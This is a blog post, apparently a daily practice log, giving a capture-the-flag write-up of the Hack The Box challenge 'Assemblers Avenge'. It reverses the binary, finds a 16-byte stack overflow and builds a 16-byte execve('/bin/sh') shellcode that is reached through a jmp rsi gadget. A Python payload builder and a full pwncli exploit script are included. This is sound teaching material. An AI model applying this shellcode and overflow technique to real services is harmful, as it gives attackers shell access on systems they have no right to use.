selph
Published on 2024-11-02 / 46 Visits

Daily Practice 9: [HTB] Assemblers Avenge

Preface

This challenge is a shellcode-writing exercise.

Daily challenge plan: push myself to practice and share one challenge a day! If you want to grind challenges together, we can practice together and keep each other accountable!

Today is day 9. I was playing 强网杯 (QWB CTF) today and couldn't solve a single challenge (sad).

Challenge overview

Amidst the harrowing conflict, our city bore the brunt of relentless onslaughts, witnessing widespread devastation that spared little, ravaging both infrastructure and spirit alike. Now, as the dust settles and the echoes of chaos fade, a clarion call emerges: assemble a force to restore justice and herald a new era of tranquility. With the remnants of our past preserved within this binary, embark on your mission to reclaim our future.

    Arch:       amd64-64-little
    RELRO:      No RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x400000)
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No

Every protection is off (no canary, executable stack, no PIE), so this looks like a shellcode challenge.

Reverse engineering

There are only these few functions:

.text:0000000000401000 ; Attributes: noreturn bp-based frame
.text:0000000000401000
.text:0000000000401000 ; void __fastcall __noreturn start(int, void *, size_t)
.text:0000000000401000                 public _start
.text:0000000000401000 _start          proc near               ; DATA XREF: LOAD:0000000000400018↑o
.text:0000000000401000                                         ; LOAD:0000000000400088↑o
.text:0000000000401000                 push    rbp
.text:0000000000401001                 mov     rbp, rsp
.text:0000000000401004                 sub     rsp, 20h
.text:0000000000401008                 call    _write
.text:000000000040100D                 call    _read
.text:0000000000401012                 call    _exit
.text:0000000000401012 _start          endp
.text:0000000000401012
.text:0000000000401017
.text:0000000000401017 ; =============== S U B R O U T I N E =======================================
.text:0000000000401017
.text:0000000000401017 ; Attributes: bp-based frame
.text:0000000000401017
.text:0000000000401017 ; ssize_t write(int fd, const void *buf, size_t n)
.text:0000000000401017 _write          proc near               ; CODE XREF: _start+8↑p
.text:0000000000401017                 push    rbp
.text:0000000000401018                 mov     rbp, rsp
.text:000000000040101B                 sub     rsp, 20h
.text:000000000040101F                 mov     rax, 1
.text:0000000000401026                 mov     rdi, 1          ; fd
.text:000000000040102D                 lea     rsi, message    ; "~~ When you stare into the abyss, the a"...
.text:0000000000401035                 mov     rdx, 62h ; 'b'  ; count
.text:000000000040103C                 syscall                 ; LINUX - sys_write
.text:000000000040103E                 leave
.text:000000000040103F                 retn
.text:000000000040103F _write          endp
.text:000000000040103F
.text:0000000000401040
.text:0000000000401040 ; =============== S U B R O U T I N E =======================================
.text:0000000000401040
.text:0000000000401040 ; Attributes: noreturn
.text:0000000000401040
.text:0000000000401040 ; void __noreturn exit(int status)
.text:0000000000401040 _exit           proc near               ; CODE XREF: _start+12↑p
.text:0000000000401040                 mov     rax, 1
.text:0000000000401047                 mov     rdi, 1          ; fd
.text:000000000040104E                 lea     rsi, goodbye    ; "\n~~ Farewell ~~\n"
.text:0000000000401056                 mov     rdx, 11h        ; count
.text:000000000040105D                 syscall                 ; LINUX - sys_write
.text:000000000040105F                 mov     rax, 3Ch ; '<'
.text:0000000000401066                 xor     rdi, rdi        ; error_code
.text:0000000000401069                 syscall                 ; LINUX - sys_exit
.text:000000000040106B                 jmp     rsi
.text:000000000040106B _exit           endp
.text:000000000040106B
.text:000000000040106D
.text:000000000040106D ; =============== S U B R O U T I N E =======================================
.text:000000000040106D
.text:000000000040106D ; Attributes: bp-based frame
.text:000000000040106D
.text:000000000040106D ; ssize_t read(int fd, void *buf, size_t nbytes)
.text:000000000040106D _read           proc near               ; CODE XREF: _start+D↑p
.text:000000000040106D
.text:000000000040106D buf             = byte ptr -8
.text:000000000040106D
.text:000000000040106D                 push    rbp
.text:000000000040106E                 mov     rbp, rsp
.text:0000000000401071                 sub     rsp, 10h
.text:0000000000401075                 mov     rdi, 0          ; fd
.text:000000000040107C                 lea     rsi, [rbp+buf]  ; buf
.text:0000000000401080                 mov     rdx, 18h        ; count
.text:0000000000401087                 mov     rax, 0
.text:000000000040108E                 syscall                 ; LINUX - sys_read
.text:0000000000401090                 leave
.text:0000000000401091                 retn
.text:0000000000401091 _read           endp
.text:0000000000401091
.text:0000000000401091 _text           ends

The _read function has a stack overflow: it reserves 0x10 bytes of frame but reads 0x18 bytes into buf at rbp-8, so the last 16 bytes of input run over the saved rbp and the return address.

Exploitation analysis

Current situation:

  • The stack is executable.
  • There is a stack overflow, but it only overflows 16 bytes: read(0, buf, 0x18) into an 8-byte buffer, which is exactly enough to overwrite the saved rbp and the return address.
  • The binary provides a jmp rsi gadget (the trailing instruction of _exit at 0x40106B), and rsi still holds the address of buf, i.e. our input, when _read returns.

If we send shellcode, it has to do its whole job in at most 16 bytes (the 8 bytes of buf plus the 8 bytes of saved rbp), with the return address pointing at jmp rsi; otherwise we would have to find a way to read in more data first.

Luckily the program already contains a string we can use, so the shellcode does not need to carry "/bin/sh" itself:

.data:000000000040204F                 db 0Ah
.data:0000000000402050                 db 'Your only savior is: /bin/sh',0
.data:000000000040206D ; char goodbye[]
.data:000000000040206D goodbye         db 0Ah          

Hand-write the shellcode, assemble it and extract the raw bytes:

Assemblers Avenge ➤ ./get_shellcode_raw.sh
shellcode.s: Assembler messages:
shellcode.s: Warning: end of file not at end of a line; newline inserted
00000000  48 c7 c7 65 20 40 00 31  d2 31 f6 6a 3b 58 0f 05  |H..e @.1.1.j;X..|
00000010
./get_shellcode_raw.sh: line 4:  : command not found

shellcode_elf:     file format elf64-x86-64


Disassembly of section .text:

0000000000401000 <_start>:
  401000:       48 c7 c7 65 20 40 00    mov    rdi,0x402065
  401007:       31 d2                   xor    edx,edx
  401009:       31 f6                   xor    esi,esi
  40100b:       6a 3b                   push   0x3b
  40100d:       58                      pop    rax
  40100e:       0f 05                   syscall

That is exactly 16 bytes, which fits the constraint, so we can send it as-is. The rdi immediate 0x402065 is the "/bin/sh" inside the "Your only savior is: /bin/sh" string at 0x402050 (0x402050 + 0x15), and push 0x3b / pop rax loads the execve syscall number in 3 bytes instead of 5.
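To make the layout explicit, here is an added example of mine (not the post's exploit and not part of the challenge files): it derives the overflow budget from the constants in the _read disassembly, computes the address of "/bin/sh" inside the .data string, hand-encodes the same 16 bytes the assembler produced above, and lays out the 24-byte payload. The encoder helpers, function names and the `frame_layout` labels are my own; the instruction encodings are the ones shown by objdump above.

```python
#!/usr/bin/env python3
"""Added example: model the _read frame of Assemblers Avenge, hand-encode the
16-byte execve shellcode and assemble the 24-byte payload (not the post's code)."""
import struct

# Constants read off the disassembly in the write-up.
READ_COUNT  = 0x18           # mov rdx, 18h in _read
BUF_OFFSET  = 8              # buf = rbp-8
JMP_RSI     = 0x40106B       # jmp rsi at the tail of _exit
SAVIOR_STR  = 0x402050       # .data address of the string below
SAVIOR_TEXT = b"Your only savior is: /bin/sh\x00"
SYS_EXECVE  = 59             # 0x3b on x86-64 Linux


def overflow_budget(read_count=READ_COUNT, buf_offset=BUF_OFFSET):
    """Bytes that land past the end of buf: saved rbp + return address."""
    return read_count - buf_offset


def binsh_addr(base=SAVIOR_STR, text=SAVIOR_TEXT):
    """Address of the "/bin/sh" substring inside the .data string (No PIE)."""
    return base + text.index(b"/bin/sh")


# --- minimal x86-64 encoder for exactly the instructions the shellcode uses ---
def mov_rdi_imm32(imm):
    """48 c7 c7 imm32: mov rdi, sign-extended imm32 (7 bytes; movabs would be 10)."""
    if not -2**31 <= imm < 2**31:
        raise ValueError("immediate does not fit a sign-extended imm32")
    return b"\x48\xc7\xc7" + struct.pack("<i", imm)


def xor_edx_edx():
    return b"\x31\xd2"                          # rdx = 0 (envp) in 2 bytes


def xor_esi_esi():
    return b"\x31\xf6"                          # rsi = 0 (argv) in 2 bytes


def push_imm8(v):
    return b"\x6a" + struct.pack("<b", v)       # push sign-extended imm8


def pop_rax():
    return b"\x58"


def syscall():
    return b"\x0f\x05"


def build_shellcode(binsh=None):
    """execve(binsh, NULL, NULL); same 16 bytes as the objdump listing above."""
    if binsh is None:
        binsh = binsh_addr()
    return (mov_rdi_imm32(binsh) + xor_edx_edx() + xor_esi_esi()
            + push_imm8(SYS_EXECVE) + pop_rax() + syscall())


def build_payload(shellcode=None, ret=JMP_RSI):
    """buf and the saved rbp receive the shellcode; the return slot gets jmp rsi."""
    if shellcode is None:
        shellcode = build_shellcode()
    slots = BUF_OFFSET + 8          # 8 bytes of buf + 8 bytes of saved rbp = 16
    if len(shellcode) > slots:
        raise ValueError(f"shellcode is {len(shellcode)} bytes, only {slots} fit "
                         "before the return address")
    payload = shellcode.ljust(slots, b"\x90") + struct.pack("<Q", ret)
    assert len(payload) == READ_COUNT   # exactly what the read(0, buf, 0x18) consumes
    return payload


def frame_layout(payload):
    """Where each 8-byte chunk of the input lands relative to the _read frame."""
    names = ["buf (rbp-8)", "saved rbp", "return address"]
    return [(name, payload[i * 8:(i + 1) * 8]) for i, name in enumerate(names)]


if __name__ == "__main__":
    sc = build_shellcode()
    print(f"shellcode ({len(sc)} bytes): {sc.hex()}")
    for name, chunk in frame_layout(build_payload(sc)):
        print(f"{name:16s} {chunk.hex()}")
```

Both size tricks are visible in the encoding: mov rdi, imm32 sign-extends a 4-byte immediate, which is why the 7-byte form works for an address below 2 GiB, and push 0x3b / pop rax sets the syscall number in 3 bytes. The gadget chain only works because syscall clobbers just rcx and r11 and leave; ret never touches rsi, so rsi is still the address of buf when jmp rsi executes; the hard-coded .data address relies on the binary having no PIE.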

Full exploit

#!/usr/bin/env python3
from pwncli import *
cli_script()                      # pwncli parses the command line (local / remote target)

io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc


# the 16-byte execve("/bin/sh") shellcode written out by get_shellcode_raw.sh above
with open("shellcode_raw", "rb") as f:
    sc = f.read()

# bytes 0-15 fill buf and the saved rbp, bytes 16-23 overwrite the return address;
# rsi still points at buf when _read returns, so jmp rsi lands on the shellcode
jmp_rsi = 0x000000000040106b
payload = sc + pack(jmp_rsi)      # 24 bytes, exactly what read(0, buf, 0x18) consumes
s(payload)                        # pwncli shorthand for io.send
ia()                              # pwncli shorthand for io.interactive

Summary

A shellcode challenge solved with hand-written shellcode: a 16-byte execve stub that borrows "/bin/sh" from the binary's own .data, plus a jmp rsi gadget to reach it.
